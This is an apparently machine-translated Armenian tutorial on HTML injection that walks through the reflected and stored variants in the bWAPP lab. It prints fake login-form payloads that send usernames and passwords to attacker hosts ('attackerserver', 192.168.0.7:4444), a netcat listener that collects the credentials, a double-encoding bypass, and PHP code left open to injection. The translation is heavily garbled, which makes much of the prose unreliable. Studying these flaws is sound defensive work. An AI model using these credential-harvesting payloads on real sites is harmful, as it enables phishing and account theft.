July 18, 2025

HTML / CSS խոցելիություն վեբ ծրագրերում

Այս հոդվածում ես որոշեցի հավաքել HTML / CSS ներարկումների շահագործման օրինակներ `օգտագործելով վեբ ծրագրերի թեստավորման վայրերից մեկը: Խելագարված վեբ դիմում - BWAPP

Սա բաց կոդով վեբ հավելված է `անվճար ներբեռնելու համար: Հուսով եմ, որ սայթաքելուց հետո սայթաքելիս ձեզ կհետաքրքրի տեղեկատվական անվտանգության թեման (IB), կամ դա կլինի պարզապես լավ խաբեություն `նման առաջադրանքների լուծման համար: Եթե հարցեր առաջանան, ես ուրախ կլինեմ պատասխանել նրան մեկնաբանություններում.

Այսօր մենք կքննարկենք չորս խոցելիությունը A1-Incject բաժնում:

/HTML ներարկում - արտացոլված (ստացեք)/

/HTML ներարկում - արտացոլված (փոստ)/

/HTLM ներարկում - արտացոլված (URL)/

/HTML ներարկում - պահվում է/

Խոցելիության տեսություն

Նրանց համար, ովքեր գիտեն, կարող եք անմիջապես ոլորել: HTML / CSS ներարկումը հնարավոր է դառնում տվյալների սխալ ստուգման պատճառով, որը սովորական օգտագործողը մտնում է: Վեբ մշակողը երբեմն չի ենթադրում, որ օգտագործողը դաշտում կներկայացնի Bob անունը.

<?php
   $name = $_REQUEST ['name'];
?>
<html>
   <h1>Welcome to the Internet!</h1>
   <br>
 <body>
       Hello, <?php echo $name; ?>!
       <p>We are so glad you are here!</p>
 </body>
</html>

HTML ներարկում - արտացոլված (ստացեք)

Անունով անմիջապես պարզ է, որ կօգտագործվի URL- ին պարամետրեր փոխանցելու եղանակը: Էջը մուտք գործելուց հետո մենք կարող ենք դիտարկել մուտքի դաշտերը.

Անվտանգություն

Թեստի տվյալները մուտքագրելուց հետո մեր հասցեի լարը ունի ձեւը:

htmli_get.php? Անուն = Test &amp; Lastname = Test &amp; Form = Ներկայացրեք

Դրանից մենք տեսնում ենք, որ ազգանունի եւ ազգանունի երկու պարամետրերը փոխանցվում են, եւ մենք տեսնում ենք էկրանին սովորական արդյունքը:

Անվտանգություն

Հիմա փորձենք HTML պիտակներ ավելացնել մեր նպատակային գծին:

htmli_get.php? Անուն = Փորձարկում

Մենք ավելացրեցինք երկու պիտակ վերնագիր :

Անվտանգություն

Ավելին, էջը ամբողջովին մեր տրամադրության տակ է, եւ մենք կարող ենք անել այն ամենը, ինչ մենք կարող ենք անել այն ամենը, ինչ կօգտագործենք նման HTML կոդ, պարզապես մուտքագրելով այն առաջին անվանման դաշտում :

<h3>Please Enter Your Username and Password to Proceed:</h3> 
<form method="POST" action="http://attackerserver/login.php"> 
      Username: <input type="text" name="username" /><br /> 
      Password: <input type="password" name="password" /><br /> 
<input type="submit" value="Login" /></form><!--

Նման ներարկման արդյունքը թույլտվության դաշտում էջի ամբողջական փոխարինումն է, եւ մուտքագրված բոլոր տվյալները կուղարկվեն ձեզ.

Անվտանգություն

HTML ներարկում - արտացոլված (փոստ)

Այս եւ նախորդ ներարկման տարբերությունը փոքր է, ավելի ճիշտ, միայն պարամետրերը փոխանցելու մեթոդով: Փոստային պահանջի մեջ պարամետրերը փոխանցվում են փաթեթի ներսում, եւ դա կարող է օգտագործվել Burp Suite- ը:

Անվտանգություն

Ներարկման հետագա տեխնիկան լիովին համընկնում է նախորդ օրինակին, բայց բոլոր պարամետրերը չեն փոխարինվում URL էջերով, բայց փոստային փաթեթի մարմնում.

Անվտանգություն

HTML ներարկում - արտացոլված (URL)

Յուրահատուկ խոցելիություն, հիմնվելով հենց սերվերի աշխատանքի վրա: Էջում աշխատում է JS, որը կարդում է ներկայիս օգտագործողի URL- ն եւ տանում է էջը: Լավ նկարագրություն կարելի է գտնել DOM-XSS էջում http://www.acunetix.com/blog/articles/Dom-xss-xplained/

Անվտանգություն

Իր գործունեության համար պարզապես անհրաժեշտ է ավելացնել անհրաժեշտ արժեքները ընթացիկ էջի հասցեից հետո:

htmli_current_url.php #1>

htmli_current_url.php?1>

Անվտանգություն

HTML ներարկում - պահվում է

Այս օրինակը հիմնված է նախորդ բոլորի վրա եւ անհրաժեշտ է HTML անարմանի տեսողական գործունեության համար: Էջի մուտքի մոտ մենք տեսնում ենք հաղորդագրություններ հրապարակելու հնարավորությունը (դրանք պահվում են տվյալների բազայում եւ ցուցադրվում են այս էջ այցելած յուրաքանչյուրի կողմից).

Անվտանգություն

Էջը շահագործելու մի քանի եղանակներ կան:

  1. Ուղարկեք բացման պիտակի մեկնաբանությունը &lt;!-- , что позволит полностью остановить работу т.к. новые данные будут восприниматься как комментарий к коду.
  2. Ձեր հաղորդագրությունները հատկացրեք հատուկ պիտակների միջոցով եւ ուրիշներ.
  3. Լրացրեք էջը եւ վերափոխեք մուտքագրված տվյալները ինքներդ ձեզ.

Օրինակ, հաշվի առեք երրորդ կետը: Սկզբում մենք պետք է տեղադրենք նավահանգիստը ձեր համակարգչին լսելու համար: Linux- ի համար օգտագործվում է NC -VLP 80 թիմը: Հաջորդը, տեղադրեք մի տեքստ, որը կփոխարինի բնօրինակ էջը բոլորի հետ.

Անվտանգություն

Մնում է առավել ձանձրալի եւ երկար հատվածը. Սպասեք, որ ինչ-որ մեկը մուտքագրեք իր տվյալները էջում եւ կտտացրեք ուղարկելու համար…

Անվտանգություն

HTML ներարկման ձեռնարկ

Ինչ է HTML- ը?

HTML- ը «հիպերտեքստի նշման լանգաժ» հապավում է: Այն ցանցի հիմնական շինարարական բլոկ է, որը որոշում է վեբ էջերի ձեւավորումը վեբ ծրագրերի համար: HTML- ն օգտագործվում է այնպիսի կայքեր մշակելու համար, որոնք բաղկացած են «հիպերտեքստից», «տեքստի ներսում տեքստը» ավելացնելու համար, որպես հիպերհղում եւ տարրերի համադրություն: Այս տարրերը ներառում են զննարկիչում ցուցադրման համար անհրաժեշտ տվյալները.

Այսպիսով, որոնք են այս բաղադրիչները?

Element- ը HTML ցանկացած էջի կարեւոր բաղադրիչ է, այսինքն, այն պարունակում է բացման եւ փակման պիտակ, նրանց միջեւ տվյալների միջոցով.

HTML պիտակ

HTML պիտակը նշում է բովանդակության բեկորները, ինչպիսիք են «վերնագիրը», «պարբերությունը», «ձեւը» եւ այլն: Այն անվանում է անկյուններ, որոնք շրջապատված են անկյունային փակագծերով: Դրանք երկու տեսակի են. «Նախնական պիտակ», որը նույնպես հայտնի է որպես Բացման պիտակը, եւ «վերջնական պիտակը», որը դեռ կոչվում էր փակման. Զննարկիչները չեն ցուցադրում այս HTML պիտակները, բայց դրանք օգտագործեք վեբ էջի բովանդակությունը գրավելու համար.

HTML հատկանիշներ

Որոշ լրացուցիչ տեղեկատվություն տարրերին տրամադրելու համար օգտագործվում են ատրիբուտներ: Դրանք գտնվում են նախնական պիտակի մեջ եւ ընդգրկված են «Անուն / արժեք» զույգի մեջ, այնպես որ ատրիբուտի անվանումը հետեւում է «հավասար նշանակող նշանին», եւ ատրիբուտի արժեքը պարունակվում է մեջբերման նշանների մեջ.

<a href = "//cisoclub.ru">CISO CLUB</a>

Այստեղ «HREF» - ը հատկանիշի անունն է, եւ «// Cisoclub» - ը դրա իմաստն է.

Քանի որ այժմ օգտագործողը գիտի HTML տերմինաբանության հիմունքները, ժամանակն է ստուգել «HTML Elements Flowchart», Եվ հետո փորձեք իրականացնել ամեն ինչ, որպեսզի ստեղծեք պարզ վեբ էջ.

Հիմքի էջ HTML

Ինտերնետում յուրաքանչյուր վեբ էջ HTML ֆայլ է: Այս ֆայլերը ոչ այլ ինչ են, քան պարզ տեքստային փաստաթղթերը .html ընդլայնմամբ, որոնք պահպանվում եւ կարդում են զննարկչի միջոցով.

Ժամանակն է փորձել ստեղծել պարզ վեբ էջ ձեր նոթատետրում եւ պահպանել այն որպես hack.html:

<html>
<head>
<title> Hacking Articles lab</title>
</head>
<body bgcolor="pink">
<br>
<center><h2>WELCOME TO <a href=”http://hackingarticles.in”>HACKING ARTILCES </a></h2>
<br>
<p>Author “Raj Chandel”</p>
</center>
</body>
</html>

Այժմ դուք պետք է բացեք hack.html Պատկերացրեք ձեր զննարկիչը եւ տեսեք, թե ինչ է ստեղծվել.

Հիանալի !! Առաջին վեբ էջը հաջողությամբ ստեղծվեց: Բայց ինչպես է այն գործում?

  • <HTML&gt; HTML- ի յուրաքանչյուր էջի արմատային տարր է
  • <Գլուխ&gt; Փաստաթղթի մասին պարունակում է մետա
  • <Վերնագիր&gt; Կատարում է գլխաշոր վեբ էջ
  • <Մարմնի&gt; Պարունակում է տեսանելի էջի բովանդակություն, որը bgcolor- ը վերածում է վարդագույնի
  • <BR&gt; սահմանում է կոտրվածքային գիծը կամ ուղարկում է հաջորդ տող
  • <H1&gt; մեծ վերնագիր է սահմանում
  • <P&gt; սահմանում է պարբերությունը
  • <A&gt; Որոշում է պիտակի պիտակը, որն օգնում է ավելացնել հղումը

Օգտագործողը այժմ հասկանում է, թե որն է HTML- ը եւ որն է դրա հիմնական նպատակը: Այսպիսով, արժե փորձել գտնել հիմնական բացթողումները եւ հասկանալ, թե ինչպես են հարձակվողները կամայական HTML կոդերը ներմուծում խոցելի վեբ էջերի մեջ, դրանց վրա տեղադրված բովանդակությունը փոխելու համար.

Ծանոթություն HTML- ի հետ

HTML-ինդեքսը, որը նաեւ կոչվում է «Վիրտուալ վնաս», ամենապարզ եւ ամենատարածված խոցելիություններից է, որոնք առաջանում են, երբ վեբ էջը չի մաքրում մուտքային տվյալները, ինչը կարող է ներմուծել պարունակության վեբ էջերը եւ նույնիսկ ներմուծել որոշ գաղտնի տեղեկատվություն.

Այս հոդվածը նման սցենար է համարում եւ բացատրում, թե ինչպես են իրականացվում HTML ներարկման նմանատիպ գրոհները.

Ժամանակն է դիմել վեբ դիմումի, որը խոցելի է HTML ներարկման եւ չի ստուգում որեւէ հատուկ մուտքային տվյալներ: Այսպիսով, հարձակվողը պարզում է այս մասին, նա իր վնասակար է դարձնում «HTML մուտքի ձեւ» Խայծը ձեւով «Անվճար կինոնկարներ», խաբել զոհին `իր գաղտնի հաշվապահական հաշվառման տվյալները ուղարկելու համար.

Այժմ, երբ զոհերը կանդրադառնան այս հատուկ վեբ էջին, որտեղ նրանք կտեսնեն այս «անվճար տոմսերը» օգտագործելու հնարավորությունը: Երբ ինչ-որ մեկը կտտացնում է հղումը, նա կրկին ցույց կտա մուտքի էկրանը դիմումի մեջ, ինչը ոչ այլ ինչ է, քան հարձակվողի կողմից ստեղծված հարձակվողը «HTML ձեւ». Հետեւաբար, հենց որ մարդը մտնի իր հաշվապահական տվյալներ, հարձակվողը այն կստանա իր մեքենայի միջոցով, ինչը կհանգեցնի իր տվյալների վարկաբեկմանը.

HTML ներարկման ազդեցությունը

Երբ մուտքային դաշտերը պատշաճ կերպով չեն մշակվել ինտերնետային էջում, HTML- ներարկման այս խոցելիությունը կարող է հանգեցնել խաչմերուկի սցենարի (XSS) հարձակման կամ սերվերի կողմից (SSRF) պահանջների կեղծման: Հետեւաբար, այս խնդիրը գրանցվել է «Միջին» լրջության մակարդակով եւ գնահատմամբ «5.3»:

  • CWE-80. Սխալ չեզոքացում `կապված HTML պիտակների սցենարի հետ վեբ էջում
  • CWE-79. Վեբ էջի ստեղծման ընթացքում մուտքային տվյալների ոչ պատշաճ չեզոքացում

HTML ներարկում ընդդեմ XSS- ի

Նման հարձակումների ժամանակ կա մի հավանականություն, որ օգտագործողը չի կարողանա կատարել HTML ներարկիչ, եւ նա կմտնի XSS-Atak, քանի որ նման է HTML վարակը Intershyte սցենար. Այնուամենայնիվ, եթե դուք ուսումնասիրում եք առկա տեղեկատվությունը, կարող եք նկատել, որ XSS- ի հարձակման ընթացքում հարձակվողը կարողանում է մտնել եւ կատարել JavaScript կոդեր, իսկ HTML- ի վարակը.

Հաջորդը, դուք պետք է ավելին իմանաք HTML ներարկումների գրոհների մասին եւ ստուգեք անսովոր մեթոդները, որոնցում օգտագործողը կարող է գրավել վեբ էջը եւ ստանալ զոհերի հաշվապահական հաշվառման տվյալները.

Պահված HTML

Պահված HTML- ը կոչվում է նաեւ Persiveral HTML, քանի որ այս խոցելիության միջոցով ներդրված վնասակար սցենարը անընդհատ պահվում է վեբ հավելվածի սերվերի ներսում, եւ դիմումի սերվերը այնուհետեւ այն այցելում է ներկայացվող վեբ էջում: Երբ Հաճախորդը սեղմում է օգտակար բեռի վրա, որը հայտնվում է կայքի պաշտոնական մասի տեսքով, ներդրված HTML կոդը կկատարվի զննարկչի միջոցով.

Պահված HTML- ի ամենատարածված օրինակը «Մեկնաբանության տարբերակ» բլոգերում, որոնք թույլ են տալիս ցանկացած օգտագործող թողնել իր ակնարկները ինչպես կառավարչի եւ այլ օգտագործողների համար հաղորդագրությունների տեսքով.

Այժմ դուք պետք է փորձեք օգտագործել այս HTML խոցելիությունը եւ գրավել հաշվապահական հաշվառման տվյալները.

Օգտագործում Պահված HTML

Օգտագործողը բացեց թիրախային IP- ն իր զննարկիչում եւ մուտք գործեց համակարգը BWAPP- ի ներսում, որպես մեղու..

Այժմ մարդը կվերականգնվի դեպի վեբ էջ, որը խոցելի է HTML ներարկման համար, ինչը հնարավորություն է տալիս օգտագործողին ուղարկել իր մուտքը բլոգում, ինչպես ցույց է տրված նկարում, ինչպես ցույց է տրված էկրանի վրա.

Սկզբնապես օգտագործողի սովորական մուտքը «Հաքեր հոդվածներ» կոչվող «Հաքեր հոդվածներ», հաստատելու համար, որ մուտքային տվյալները հաջողությամբ պահպանվում են վեբ սերվերի տվյալների բազայում: Այսպիսով, ամեն ինչ տեսանելի է մուտքային դաշտում.

Ժամանակն է փորձել ներկայացնել իր վնասակար օգտակար բեռը, որը կստեղծի կեղծ օգտագործողի մուտքի ձեւ այս նպատակային էջում, եւ, հետեւաբար, այն կվերափոխի գրավված հարցումը մեկ այլ IP հասցե.

HTML Ataku կազմաձեւելու համար հարկավոր է մուտքագրել հաջորդ HTML կոդը տվյալ տեքստի շրջանում.

<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index:1000; background-color:white; padding:1em;">Please login with valid 
credenitals:<br><form name="login" action="http://192.168.0.7:4444/login.htm">
<table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td>
<td><input type="text" name="password"/></td></tr><tr>
<td colspan=2 align=center><input type="submit" value="Login"/></td></tr>
</table></form>

Ստորեւ ներկայացված պատկերում կարող եք տեսնել, որ երբ օգտագործողը սեղմում էր «Ուղարկել» կոճակը, համակարգի մուտքի նոր ձեւը հայտնվեց համացանցում: Այսպիսով, մուտքի այս ձեւը այժմ գտնվում է դիմումի վեբ սերվերում, որը պատկերված է ամեն անգամ, երբ տուժողը այցելում է այս վնասակար մուտքի էջը: Այս ձեւը միշտ կլինի, եւ այն մարդկանց է փնտրում պաշտոնական էջով.

Այժմ անհրաժեշտ է NetCat ունկնդիրին միացնել 4444 նավահանգիստը `տուժողի խնդրանքը ընդհատելու համար.

nc -lvp 4444

Ժամանակն է սպասել, մինչեւ զոհը բեռնի այս էջը իր զննարկիչում եւ մտնի հաշվապահական հաշվառման տվյալներ.

Հիանալի !! Վերոնշյալ պատկերում օգտագործողը կարող է նկատել, որ «Ռաջը» բացեց վեբ էջ եւ փորձեց մուտք գործել որպես ռաջ:123.

Այսպիսով, արժե վերադառնալ ունկնդիր եւ ստուգել, հաշվապահական հաշվառման տվյալները գրանցվում են պատասխանի մեջ, թե ոչ.

Ստորեւ բերված պատկերը ցույց է տալիս, որ օգտագործողը հաջողությամբ խլել է մարդկանց հաշվապահական հաշվառման տվյալները.

Արտացոլված HTML

Արտացոլված HTML- ը դեռ հայտնի է որպես Fissitive HTML: Այս խնդիրը ծագում է, երբ վեբ դիմումը անմիջապես պատասխանում է օգտագործողին, առանց ստուգելու օգտագործողը, ինչը կարող է հանգեցնել գործադիր զննարկչի կոդով մեկ HTML պատասխան: Այն կոչվում է «արտացոլված», քանի որ չարամիտ սցենարը պահվում է վեբ սերվերի ներսում, այնպես որ հարձակվողը պետք է լինի չարամիտ կապ, որպեսզի օգտագործողը «ծուղակի մեջ գա»».

Արտացոլված HTML խոցելիությունը կարելի է հեշտությամբ հայտնաբերել կայքի որոնիչներում. Այստեղ հարձակվողը տեքստի որոնումներում գրառում է որոշ կամայական HTML կոդ, եւ եթե կայքը խոցելի է, արդյունքում ստացված էջը կվերադառնա որպես պատասխաններ այս HTML-Suction- ին.

Արտացոլված HTML- ն կա երեք տեսակ:

  • Արտացոլված HTML ստացեք
  • Արտացոլված HTML գրառումը
  • Արտացոլված HTML ընթացիկ URL- ն

Նախքան սկսելը `արտացոլված HTML լաբորատորիան, ժամանակն է հիշել, որ ստացված մեթոդը օգտագործելը պահանջում է տվյալներ որոշակի աղբյուրից.

Արտացոլված HTML ստացեք

Օգտագործողը ստեղծեց վեբ էջ, որը թույլ է տալիս մարդուն հետադարձ կապ ուղարկել իր տվյալների հետ.

Այսպիսով, երբ «Raj Chandel» օգտվողը ուղարկում է իր կարծիքը, հայտնվում է պատասխան. «Շնորհակալ եմ, Raj Chandel, տրված ժամանակի համար».

Այս ակնթարթային պատասխանը եւ «Անունը / արժեքը» միկրոլը ցույց է տալիս, որ այս էջը կարող է խոցելի լինել HTML-ներարկման համար, եւ տեղեկատվությունը պահանջվել է ստանալ ստացման մեթոդը.

Այսպիսով, ժամանակն է փորձել ներմուծել այս ձեւի որոշ HTML կոդեր, այն փոխելու համար: Դուք պետք է օգտագործեք հաջորդ սցենարը դաշտում »Անունը”:

<h1>Raj Chandel</h1>

Եւ տեղադրեք հետադարձ կապը հաղորդագրության հետ. «Լավ».

Ստորեւ ներկայացված պատկերով օգտագործողը կարող է տեսնել, որ օգտագործողի անունը «Raj Chandel» -ը փոխվել է որպես վերնագիր, ինչպես պատասխան հաղորդագրության մեջ.

Զարմանում եմ, թե ինչու է այս ամենը պատահել, արժե ստուգել կոդի հաջորդ հատվածը.

Հեշտությամբ ցուցադրված հաղորդագրությունները էկրանին, մշակողը չի տեղադրել որեւէ ներդրումային ստուգում, այսինքն, նա պարզապես ստեղծեց «Երախտագիտության հաղորդագրության» եզրակացությունը, ներառյալ մուտքային անունը փոփոխականի միջոցով »$ _get”.

Կան ժամանակներ, երբ ծրագրավորողը որոշակի ստուգումներ է սահմանում մուտքային դաշտերում, որոնք, այդպիսով, արտացոլում են HTML կոդը էկրանին, առանց մատուցելու.

Ստորեւ ներկայացված պատկերում կարող եք տեսնել, որ երբ օգտագործողը փորձեց կատարել HTML կոդը անվանման դաշտում, նա այն ետ է նետել սովորական տեքստի տեսքով:

Այնպես որ, այստեղ չկա խոցելիություն?

Դուք պետք է ստուգեք այս ամենը `գրավելով ելքային խնդրանքը, օգտագործելով Burpsuite, ապա գրված հարցումը ուղղակիորեն ուղարկեք ներդիրին «Կրիչ».

Ներդիրում «Կրիչ», Երբ օգտագործողը սեղմեց «Խաչ» կոճակը, ստեղծված պատասխանը ստուգելու համար, նա հայտնաբերեց, որ HTML- ի կենսապահովումը HTML- ն էր, ինչպես այստեղ:

Այսպիսով, օգտագործողը կիրառեց ամբողջական HTML կոդը » Ռաջ «Եվ այս ամենը տեղադրեք ապակոդավորիչի ներդիրի վրա: Ծղոտե ներքեւի աջ կողմում նա սեղմեց «Կոդավորել ինչպես» եւ ընտրեց URL հասցեն.

Երբ օգտագործողը ստանում է կոդավորված եզրակացություն, նա կրկին կուղարկի նրան կոդավորելու ճիշտ URL- ի համար, որպեսզի դրանք ունենան կրկնակի URL ձեւաչափով.

Այժմ դուք պետք է փորձեք դա անել. Պատճենեք ամբողջական կրկնակի կոդավորված URL- ն եւ տեղադրեք այն «Անուն =» դաշտում `հարցման սյունակում կրկնվող ներդիրի վրա.

Օգտագործողը կտտացնում է կոճակը Գնալ, ստուգել իր առաջացած պատասխանը.

Հիանալի !! Ստորեւ ներկայացված պատկերում կարող եք տեսնել, որ մարդը հաջողությամբ շահարկել է պատասխանը.

Այժմ դուք պետք է նման փոփոխություններ կատարեք վստահված անձի ներդիրում եւ սեղմեք «առաջ» կոճակը: Ստորեւ ներկայացված պատկերով կարող եք տեսնել, որ օգտագործողը «փչացրել է» այս վեբ էջը իր ապացուցված դաշտերի միջոցով.

Արժե դիտել կոդի մի հատված, տեսնելու, թե որտեղ է մշակողը ստուգել մուտքային տվյալները.

Ստորեւ ներկայացված պատկերով կարող եք տեսնել, որ այստեղ մշակողը «հաք» գործառույթը կազմել է տվյալների փոփոխականի համար եւ նույնիսկ վերծանել «&lt;» &lt;"&lt;" »,.

Ստորեւ ներկայացված պատկերում կարող եք տեսնել, որ մշակողը իրականացրել է հաքը գործառույթի միջոցով Անվան դաշտում.

Արտացոլված HTML գրառումը

Ինչպես GET Get Get- ի դեպքում, այստեղ «Անունը» եւ «Հետադարձ կապ» դաշտերը նույնպես խոցելի են, քանի որ հետագա մեթոդը իրականացվում է, ուստի այս ձեւերը չեն ցուցադրվի URL հասցեում.

Դուք պետք է կրկին փորձեք «փչացնել» այս վեբ էջը, բայց այս անգամ օգտագործողը կավելացնի պատկեր, այլ ոչ թե ստատիկ տեքստ.

<img src= "https://www.ignitetechnologies.in/img/logo-blue-white.png">

Ստորեւ նկարում կարող եք տեսնել, որ բոցավառման տեխնոլոգիաների պատկերանշանը տեղադրված էր էկրանին: Այսպիսով, այստեղ հարձակվողը կարող է նույնիսկ ներկայացնել այլ մուլտիմեդիա ձեւաչափեր, ինչպիսիք են վիդեո, աուդիո կամ gif.

Արտացոլված HTML եւ ընթացիկ URL- ն

Կարող է վեբ դիմումը խոցելի լինել HTML- ներարկման առանց վեբ էջում առանց մուտքի դաշտերի?

Այո, հաստատ: Անհրաժեշտ չէ մուտքային տվյալներ ունենալ, ինչպիսիք են մեկնաբանությունները կամ որոնման դաշտը, որոշ ծրագրեր իրենց վեբ էջերում ցուցադրում են օգտագործողի URL- ն: Դրանք կարող են խոցելի լինել HTML ներարկումների համար, քանի որ նման դեպքերում URL- ն հանդես է գալիս որպես դրա համար մուտքային դաշտ.

Վերը նշված պատկերով կարող եք տեսնել, որ ներկայիս URL- ն ցուցադրվում է վեբ էջում, որպես «http: //192.168.0.16/hack/html_url.rnr»: Այսպիսով, դուք պետք է օգտվեք այս առավելությունից եւ կտեսնեք, թե որն է օգտագործողը կկարողանա գրավել.

Դուք պետք է մեղադրեք «Burpsuite» - ում եւ գրավեք ներկայիս HTTP հարցումը.

Այժմ օգտագործողը շահարկում է այս խնդրանքը, օգտագործելով:

/hack/html_URL.php/<h1>Hey_are_you_there?</h1>

Նա սեղմում է «առաջ» կոճակը `զննարկիչում արդյունքը ստուգելու համար.

Հիանալի !! Ստորեւ ներկայացված պատկերով կարող եք տեսնել, որ օգտագործողը հաջողությամբ «փչացրեց» կայքը, պարզապես մուտքագրելով ցանկալի HTML կոդ, վեբ հավելվածի URL հասցեում.

Դուք պետք է նայեք կոդին եւ հասկանաք, թե ինչպես է ծրագրավորողին հասցրել էկրանին ներկայիս URL- ն ստանալ.

Այստեղ մշակողը PHP- ի փոփոխականը օգտագործեց, որպես $ _server, էջի ներկայիս էջը գրավելու համար: Բացի այդ, նա փոխեց հյուրընկալողի անունը, օգտագործելով «http_host» - ը եւ URL- ի ռեսուրսի պահանջվող գտնվելու վայրը `օգտագործելով« հարցում_ուրի »եւ այս ամենը տեղադրեց փոփոխական $ URL- ում.

Գնալով HTML բաժին, նա պարզապես արձագանքեց Echo- ին `փոփոխական $ URL- ով` առանց որեւէ հատուկ չեկի `URL հասցեով հաղորդագրություն ցուցադրելու համար.